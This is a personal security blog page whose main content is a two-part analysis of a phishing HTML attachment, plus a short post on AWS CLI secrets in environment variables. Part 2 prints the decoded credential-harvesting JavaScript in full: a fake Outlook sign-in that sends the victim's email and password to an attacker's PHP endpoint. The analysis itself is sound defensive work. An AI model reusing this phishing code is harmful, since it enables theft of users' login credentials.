• Skip to primary navigation
  • Skip to main content
  • Skip to primary sidebar
BRNDR

BRNDR

Stuff, things and computers.

  • Blog
  • About
  • Tools

BRNDR

Finding AWS CLI Secrets in Environment Variables

June 15, 2022 by BRNDR Leave a Comment

While doing a bit of playing around with Hashicorp’s Terraform tutorial, I realized that I was being led to store secrets used to access my AWS account as a local environment variable.

My first question is how to retrieve them because if I can, so can anyone else who gains access to your machine. This doesn’t require admin access to retrieve. How many devs are storing their production keys as a local env variable? You could leverage your EDR solution or create a PowerShell script to test for their existence.

This script will let you return the secrets using a simple one-liner in PowerShell.

There has to be a better way, stay tuned for a future post.

Resource: https://docs.aws.amazon.com/cli/v1/userguide/cli-configure-envvars.html

Filed Under: Uncategorized Tagged With: aws, cli, secrets, terraform

Going Down the MalDoc Rabbit Hole – Part 2

January 17, 2022 by BRNDR Leave a Comment

This is a continuation of our first post in this series where we are trying to decode the HTML sent to us in a malicious file.

Decoded but still obscure

Glancing at the code block left over after running it through CyberChef, it still isn’t quite clear as to what this document is trying to do. Let’s take a closer look. If you paste it into your text editor, it will appear on one line. CyberChef also has an option called JavaScript Beautify which will put the code into a more human readable format.

Below we will break the code into segments to try and better understand what is going on. I removed the stuff we aren’t interested in to help clarify what is happening here. You don’t have to be a master in JavaScript to understand what is going on, but it helps to know some basics.

var earth = 'brndr[@]somecompany[.]com';
var uri = 'http:[//]test[.]santandreadescaphis[.]com/wp-includes/ID3/img_000054[.]php?1807-9248';
var key = decodeURIComponent(uri);
var bml = document.getElementById('myImageID').src = 'https:[//]api[.]statvoo[.]com/favicon/?url=somecompany[.]com';
const img = document.getElementById('banner');
img.src = bml;
var max = document.getElementById('car');
max.src = bml;

This first block is setting up the variables to be used later down in the script.

  • earth = Email address that this doc was sent to
  • uri = The website that is presumably used to stage the attack or phish
  • key = Decodes the URI, this is irrelevant now as we already decoded the URI in Cyber Chef
  • bml = Using a legitimate website to gather a favicon from the domain that the email address belongs to. If you replace it with something like facebook[.]com, it will redirect to a cached image in google. This is just trying to make this phishing attempt feel more authentic
var email = earth, PASS = document.getElementById('password'), PASSX = document.getElementById('passwordx'), PASSY = document.getElementById('passwordy');
$('#password').focus();
var displayName = $('#displayName');
displayName.attr('value', email), displayName.html(email), $('#password').keyup(function (e) {
	13 == e.which && $('#Tombol1').click();
}), $('#passwordx').keyup(function (e) {
	13 == e.which && $('#Tombol2').click();
}), $('#passwordy').keyup(function (e) {
	13 == e.which && $('#Tombol3').click();
});
var Tombol1 = $('#Tombol1');
Tombol1.click(function (e) {
	e.preventDefault();
	e = $('#password').val();
	$.ajax({
		url: key,
		type: 'POST',
		dataType: 'html',
		beforeSend: function () {
			$('#loader').show();
		},
		data: {
			u: email,
			p: e
		},
		

This code block is starting to look more and more like a credential harvesting attempt. The document appears to capture data from email and password fields from a fake sign-in form and using AJAX to post it to the website that is being loaded on the backend.

crossDomain: !0,
		success: function (e) {
			$('#loader').hide(), 'VALID' == e ? ($('.FORM1').hide(), $('.Finish').show(), window.location.replace('https://outlook.office.com/')) : 'KURANG' == e ? (PASS.value = '', PASS.focus(), $('#pass').animate({
				left: 0,
				opacity: 'show'
			}, 1000), $('#error').empty(), $('#error').show(), $('#error').append("<span style='color:#FF0000;'>Your account or password is incorrect. If you don't remember your password,</span><a style='color:#0066ff; href=''>reset it now</a>.")) : 'KOSONG' == e && (PASS.value = '', PASS.focus(), $('#pass').animate({
				left: 0,
				opacity: 'show'
			}, 1000), $('#error').empty(), $('#error').show(), $('#error').append('Please enter the password<br>'));
		},
		error: function (e) {
			console.log(e);
		}
	});
}), (displayName = $('#displayNamey')).attr('value', email), displayName.html(email);
var Tombol3 = $('#Tombol3');
Tombol3.click(function (e) {
	e.preventDefault();
	e = $('#passwordy').val();
	$.ajax({
		url: key,
		type: 'POST',
		dataType: 'html',
		beforeSend: function () {
			$('#loadery').show();
		},
		data: {
			u: email,
			p: e
		},
		crossDomain: !0,
		success: function (e) {
			$('#loadery').hide(), 'VALID' == e ? ($('.FORM1').hide(), $('.FORM2').hide(), $('.FORM3').hide(), $('.Finish').show(), window.location.replace('https://outlook.office.com/')) : 'KURANG' == e ? (PASSY.value = '', PASSY.focus(), $('.FORM1').hide(), $('.FORM2').hide(), $('.FORM3').show(), $('#passy').animate({
				left: 0,
				opacity: 'show'
			}, 1000), $('#errory').empty(), $('#errory').show(), $('#errory').append('Sign in attempt timeout, verify your password<br>')) : 'KOSONG' == e && (PASSY.value = '', PASSY.focus(), $('.FORM1').hide(), $('.FORM2').hide(), $('.FORM3').show(), $('#passy').animate({
				left: 0,
				opacity: 'show'
			}, 1000), $('#errory').empty(), $('#errory').show(), $('#errory').append('Please enter the password<br>'));
		},
		error: function (e) {
			console.log(e);
		}
	});
});

What Is Happening

Now let’s run this HTML file in our sandbox to see what happens. Since the JavaScript isn’t doing anything other than credential harvesting, I will allow my VM to access the internet to be able to interact with it too. Normally I would advise against this, but this is relatively safe.

Run it in our Sandbox VM

Let’s open the doc in Firefox…

If we click the x it shows us the login prompt, let’s see what happens when we enter a password.

The site spins for a moment and throws the error below. Note that the “Create one!” link is self-referencing and goes nowhere.

If we would have put in a real password it still would fail, but now the person who orchestrated the phishing attempt would have anything we entered into the password box harvested by the URL from our code snippet above.

var uri = 'http:[//]test[.]santandreadescaphis[.]com/wp-includes/ID3/img_000054[.]php?1807-9248';

If we plug this URL into our browser, it returns the word KOSONG, which is a town in North Korea. This could be a red herring to throw us off the scent, but I think we have reached the end of this rabbit hole. Thanks for reading!

Filed Under: Maldocs

Going Down the MalDoc Rabbit Hole – Part 1

November 2, 2021 by BRNDR Leave a Comment

In this article we are going to take a look at a malicious HTML file sent to us by our internet friends. While the presentation and delivery of said file was pretty suspect at the onset, I thought it would make for good practice to see what was actually happening under the covers. Join me in my search for what lies at the bottom…

Pre-requisites

To play it safe I am running the following to make sure I don’t inadvertently infect my machine:

  • VMWare Workstation Player – you can also use VirtualBox or whatever you like to use for running VMs
  • Sandbox VM – I am using REMnux to kick the wheels on it. Some may see this as overkill, but you can download the OVA and start it without any pre-installation of tools. Easy wins.
  • Text editor – VSCode is installed and I am familiar with it. This is cross-platform so it will work on Windows, Linux and Mac.

A garbled mess

Upon first inspection of the file I received titled invoice_remit-6187.xls.HTML looked to be a jumble of JavaScript. What is going on here?

Sunday JavaScript Code Jumble

The JavaScript in this document is using the unescape() function which simply stated decodes an encoded URL. It is taking all of the percent encoded text and decoding it. For example if you have a URL with am ampersand (&) in it, the URL would look like this:

  • Unecoded – sample-site.com/terms&conditions
  • Encoded – sample-site.com/terms%26conditions

Where %26 represents the ampersand character.

Now, why would they want to hide something in the JavaScript? While my aspirations of being a web developer were short lived, what I do remember is that document.write is taking the unsecaped text and writing it to the HTML. This all happens at runtime by your browser, all you have to do is open the file.

CyberChef Enters the Chat

There are lots of resources on CyberChef out there in the wilds of the internet and I urge you to read/watch as many as you can because this is a very useful (free) tool. Our use case is going to be to decode the JavaScript to see what our friends are trying to hide from us.

Since our VM isn’t connected to the internet, download the offline version of CyberChef (gchq.github.io). The download link is the top right-hand side. Copy this onto a USB drive that you can pass-through to your VM. (After doing this I realized REMnux comes with this pre-installed.)

Next, we drag URL Decode from the Favourites section over to the Recipe section.

Go back to the text editor, copy everything between the <Script type="text/javascript"> and </script> sections and paste it into the Input section. If Auto-Bake is checked, it will automatically decode, otherwise hit Bake.

Decode x1

Ok, this is weird, it looks like we are starting to see some structure to this file in the form of CSS to format the page, but we still have a lot of obfuscation going on. Let’s take our Output and run it back through Input.

Maybe there is a better way, how about instead of copying and pasting the Output back into the Input field, we add a second URL Decode step to the recipe. Let’s see what happens.

Decode x2

If you have more than one operation in your recipe, the output of the previous step is passed onto the next one as it’s input. Great we can see the underlying code, but some of the URLs embedded aren’t quote decoded yet.

Bout ready to decode

There it is this is about as decoded we can get using this recipe in CyberChef.

Decode x3

Stayed tuned for Part 2 where we will look at what this site is doing.

Filed Under: Maldocs Tagged With: cyberchef, maldoc, phishing

Primary Sidebar

Recent Posts

  • Finding AWS CLI Secrets in Environment Variables
  • Going Down the MalDoc Rabbit Hole – Part 2
  • Going Down the MalDoc Rabbit Hole – Part 1

Archives

  • June 2022
  • January 2022
  • November 2021

Categories

  • Maldocs
  • Uncategorized
  • GitHub

Copyright © 2023 - BRNDR